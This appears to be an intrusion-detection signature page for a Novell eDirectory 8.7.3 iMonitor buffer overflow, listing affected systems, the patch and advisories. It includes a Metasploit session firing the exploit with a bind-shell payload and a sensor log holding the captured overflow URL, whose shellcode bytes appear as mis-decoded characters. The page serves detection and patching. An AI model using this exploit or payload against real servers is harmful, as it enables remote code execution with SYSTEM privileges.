Novell eDirectory iMonitor buffer overflow (HTTP_Novell_iMonitor_BO)

About this signature or vulnerability

Proventia G-Series, Proventia Desktop, Proventia Network IPS, RealSecure Server Sensor, RealSecure Network Sensor, Proventia M-Series, BlackICE Agent for Server, BlackICE PC Protection, BlackICE Server Protection, Proventia Server for Windows:

This signature detects an attempt to overflow Novell eDirectory Server iMonitor by sending a specially crafted URL

Default risk level


Sensors that have this signature

Proventia G-Series: XPU 24.38, Proventia Desktop: 8.0.812.1770, Proventia Network IPS: XPU 1.77, RealSecure Server Sensor: XPU 24.38, RealSecure Network Sensor: XPU 24.38, Proventia M-Series: XPU 1.77, BlackICE Agent for Server: 3.6epi, BlackICE PC Protection: 3.6cpi, BlackICE Server Protection: 3.6.cpi, Proventia Server for Windows: 1.0.914.1770

Systems affected

Windows NT: 4.0, Windows 2000: Any version, Novell eDirectory: 8.7.3, Windows 2003: Any version


Unauthorized Access Attempt

Vulnerability description

Novell eDirectory is a software package that uses a Lightweight Directory Access Protocol (LDAP) directory service for integrating enterprise and eBusiness programs. Novell eDirectory version 8.7.3, when running on Microsoft Windows, is vulnerable to a buffer overflow caused by improper bounds checking in the iMonitor. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with SYSTEM level privileges or possibly cause dhost.ext to crash.

How to remove this vulnerability

Upgrade to the patch for this vulnerability, as listed in Novell Technical Information Document TID10098568. See References.


Secunia Security Advisory: SA16393
Novell eDirectory iMonitor Buffer Overflow Vulnerability

Novell Technical Information Document TID10098568
Buffer overflow vulnerability against eDirectory 8.7.3 imonitor on Windows

Novell Technical Information Document TID2972038
eDirectory 8.7.3 iMonitor for Win32 - TID2972038

CERT Vulnerability Note VU#213165
Novell eDirectory iMonitor vulnerable to buffer overflow

ISS X-Force
Novell eDirectory iMonitor buffer overflow




Exploit: Name Default Description
-------- ------ --------------- -----------------------------------

optional SSL Use SSL
required RHOST The target address
optional VHOST The virtual host name of the server
required RPORT 8008 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows (ALL) - eDirectory 8.7.3 iMonitor

msf edirectory_imonitor(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit Windows (ALL) - eDirectory 8.7.3 iMonitor
[*] Overflow request sent, sleeping for four seconds
[*] Exiting Bind Handler.

msf edirectory_imonitor(win32_bind) >


Date/Time 2006-06-18 22:26:11 JST
Tag Name HTTP_Novell_iMonitor_BO
Alert Name HTTP_Novell_iMonitor_BO
Severity High
Observance Type Intrusion Detection
Combined Event Count 1
Cleared Flag false
Target IP Address
Target Object Name 8008
Target Object Type Target Port
Source IP Address
SourcePort Name 1633
Sensor IP Address
Sensor Name network_sensor_1
:accessed yes
:evasions uses non-ASCII characters;
:intruder-port 1633
:URL /nds/佞7JBJ・A@GG@荘NJB屁C7J舛7FOFKKHJB傲・Fヨ@'@B櫑O廿GB澄FH'ヨHJI鋒FN桝廂G菅CB姆N妁訂僊O・@鎗@F・・GHON訪・泡OF滲GCO・・訂@C・蜂ヨGO・吏湧・ヨFNB7NF廿敦BK價鵰'ヨ趨K友僭7'@ヨ炉@O崇剞的BGB剞A・・CA只I'H'婁選'呂哲O銭・'O7N
:victim-port 8008
algorithm-id 2106212
IANAProtocolId 6
Packet DestinationAddress
Packet DestinationPort 8008
Packet DestinationPortName http-alt
Packet SourceAddress
Packet SourcePort 1633